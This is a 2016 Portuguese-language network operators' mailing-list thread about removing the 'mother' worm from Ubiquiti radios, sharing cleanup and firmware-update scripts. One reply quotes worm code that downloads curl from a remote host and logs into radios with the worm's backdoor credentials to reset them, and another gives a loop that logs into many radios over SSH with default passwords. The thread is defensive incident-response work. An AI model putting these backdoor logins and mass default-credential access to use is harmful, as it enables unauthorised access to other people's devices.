[GTER] RES: RES: RES: Script remoção virus UBNT - ** remove e atualiza **

Diego Canton de Brito diegocanton at ensite.com.br
Mon May 16 19:19:49 -03 2016


Sim, estou aproveitando o vírus pra fazer as vacinas, uma técnica foi nos meus exemplos usar a senha do vírus, isso até ajudou um provedor que usava senhas personalizadas nos clientes a limpar a rede toda.
Estou avaliando com o Alexandre da Onda, se seria possível utilizar até o CURL do vírus pra baixar a vacina direto só GIT.
--
Enviado do aplicativo myMail para Android segunda-feira, 16 maio 2016, 06:52PM -03:00 de "Rafael Stein" < rafaelpstein at gmail.com> :

>
>Pessoal não sei se ajuda mas olhando os scripts do vírus acredito que seja
>bom bloquear todos os acessos ao destino downloads.openwrt.org
>
>Segue trecho do script
>test -e $per/curl || dwn
>http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/curl_7.17.1-1_
>mips.ipk usr/bin/curl
>chmod +x $per/curl
>test -e $per/libcurl.so.4 || dwn
>http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libcurl_7.17.1
>-1_mips.ipk usr/lib/libcurl.so.4.0.1
>mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
>test -e $per/libssl.so.0.9.8 || dwn
>http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libopenssl_0.9
>.8i-3.1_mips.ipk 'usr/lib/lib*'
>
>Outra coisa é que ele cria um usuário mother e senha fucker no radio e assim
>da pra acessar o radio que tenha a gerencia perdida
>
>LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F
>"uri=index.cgi" -F "username=mother" -F "password=fucker" -H "Expect:"
>"$url/login.cgi"
>LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F
>"uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"
>
>
>Acredito que com isso de pra resolver alguns problemas sem ir no local.
>
>
>
>
>
>-----Mensagem original-----
>De: gter [mailto:gter-bounces at eng.registro.br] Em nome de Alexandre J.
>Correa (Onda)
>Enviada em: segunda-feira, 16 de maio de 2016 16:44
>Para: Grupo de Trabalho de Engenharia e Operacao de Redes
>< gter at eng.registro.br >
>Assunto: Re: [GTER] RES: RES: Script remoção virus UBNT - ** remove e
>atualiza **
>
>Diego, uma das variantes faz o upload inicial dentro desta pasta 'upload',
>mas ela é uma pasta que não fica no disco, se rebootar o rádio, ela some com
>o conteúdo.
>
>
>Em 16/05/2016 14:38, Diego Canton de Brito escreveu:
>> Poderia explicar a necessidade desse RM?
>> A pasta para mim está vazia.
>>
>> Att,
>>
>> -----Mensagem original-----
>> De: gter [mailto:gter-bounces at eng.registro.br] Em nome de Gabriel 
>> Mineiro Enviada em: segunda-feira, 16 de maio de 2016 14:15
>> Para: Grupo de Trabalho de Engenharia e Operacao de Redes
>> Assunto: [GTER] RES: Script remoção virus UBNT - ** remove e atualiza 
>> **
>>
>> Ninguém está limpando a pasta /var/tmp/upload? A menos não vi nos scripts
>sugeridos. O aplicativo da Ubnt não remove.
>>
>> Gabriel Mineiro
>>  www.tca.com.br
>>
>> -----Mensagem original-----
>> De: gter [mailto:gter-bounces at eng.registro.br] Em nome de Guilherme 
>> Ganascim Enviada em: segunda-feira, 16 de maio de 2016 07:53
>> Para: Grupo de Trabalho de Engenharia e Operacao de Redes 
>> < gter at eng.registro.br >
>> Assunto: Re: [GTER] Script remoção virus UBNT - ** remove e atualiza 
>> **
>>
>> Para quem estiver com problema, estou usando um FOR para limpar tudo 
>> de uma vez, troca a porta e desativa o HTTPs e coloca um LOG para 
>> verificar depois;
>>
>> ##
>> for IP in `cat ips`;do sshpass -p ‘ubnt’  ssh -o "ConnectTimeout 15" 
>> -o "StrictHostKeyChecking no" -o "UserKnownHostsFile=/dev/null" 
>> ubnt@$IP -p22 'cd /etc/persistent/ ; rm mf.tar; rm rc.poststart ; rm 
>> -R .mf ; sed -i 's/sshd.port=22/sshd.port=2222/g' /tmp/system.cfg;echo 
>> httpd.port=81 >> /tmp/system.cfg;echo httpd.https.status=disabled >> 
>> /tmp/system.cfg; cfgmtd -p /etc/persistent/ -w ; cat /tmp/system.cfg | 
>> grep wireless.1.ssid | grep mot && echo "NAO DEU"  || reboot' >> 
>> /tmp/analise.log 2>&1  & sleep 1;done
>>
>> Obrigado
>>
>> 2016-05-15 18:32 GMT-03:00 Elizandro Pacheco [ Pacheco Tecnologia ] <
>>  elizandro at pachecotecnologia.net >:
>>
>>> Ferramenta Oficial:
>>>
>>>
>>>  http://community.ubnt.com/t5/airMAX-General-Discussion/Malware-Remova
>>> l
>>> -Tool-05-15-2016/m-p/1564953#U1564953
>>>
>>>
>>> Poderiam unir as threads né?
>>>
>>>
>>> Elizandro Pacheco
>>>
>>>
>>>> Em 15 de mai de 2016, à(s) 14:32, Diego Canton de Brito <
>>>  diegocanton at ensite.com.br > escreveu:
>>>> Obrigado Alexandre, atualizado
>>>>
>>>> Em 2016-05-15 02:34, Alexandre J. Correa (Onda) escreveu:
>>>>
>>>>> Versão que remove e atualiza o rádio
>>>>>
>>>>> #!/bin/sh
>>>>> #ajcorrea
>>>>>
>>>>> /bin/sed -ir '/mcad/ c ' /etc/inittab /bin/sed -ir '/mcuser/ c '
>>>>> /etc/passwd /bin/rm -rf /etc/persistent/https /bin/rm -rf 
>>>>> /etc/persistent/mcuser /bin/rm -rf /etc/persistent/mf.tar /bin/rm 
>>>>> -rf /etc/persistent/.mf /bin/rm -rf /etc/persistent/rc.poststart 
>>>>> /bin/rm -rf /etc/persistent/rc.prestart /bin/kill -HUP `/bin/pidof 
>>>>> init` /bin/kill -9 `/bin/pidof mcad` /bin/kill -9 `/bin/pidof init` 
>>>>> /bin/kill -9 `/bin/pidof search` /bin/kill -9 `/bin/pidof mother` 
>>>>> /bin/kill -9 `/bin/pidof sleep` /bin/cfgmtd -w -p /etc/
>>>>>
>>>>> versao=`cat /etc/version | cut -d'.' -f1` cd /tmp
>>>>>
>>>>> if [ "$versao" == "XM" ]; then
>>>>> URL='
>>>
>http://dl.ubnt.com/firmwares/XN-fw/v5.6.4/XM.v5.6.4.28924.160331.1253.bin '
>>>>> wget $URL
>>>>> ubntbox fwupdate.real -m /tmp/XM.v5.6.4.28924.160331.1253.bin
>>>>> else
>>>>> URL='
>>>
>http://dl.ubnt.com/firmwares/XW-fw/v5.6.4/XW.v5.6.4.28924.160331.1238.bin '
>>>>> wget $URL
>>>>> ubntbox fwupdate.real -m /tmp/XW.v5.6.4.28924.160331.1238.bin
>>>>> fi
>>>>>
>>>>> Diego Canton, atualiza o GITHUB lá que este procedimento já ajuda
>>> bastante a galera...
>>>> --
>>>> gter list  https://eng.registro.br/mailman/listinfo/gter
>>> --
>>> gter list  https://eng.registro.br/mailman/listinfo/gter
>>>
>>
>>
>> --
>> Guilherme Ganascim
>> Mobile: +554399526000
>> --
>> gter list  https://eng.registro.br/mailman/listinfo/gter
>> --
>> gter list  https://eng.registro.br/mailman/listinfo/gter
>>
>>
>> --
>> gter list  https://eng.registro.br/mailman/listinfo/gter
>
>
>
>--
>Sds.
>
>Alexandre Jeronimo Correa
>Onda Internet
>Office: +55 34 3351 3077
>www.onda.net.br
>
>--
>gter list  https://eng.registro.br/mailman/listinfo/gter
>
>--
>gter list  https://eng.registro.br/mailman/listinfo/gter


More information about the gter mailing list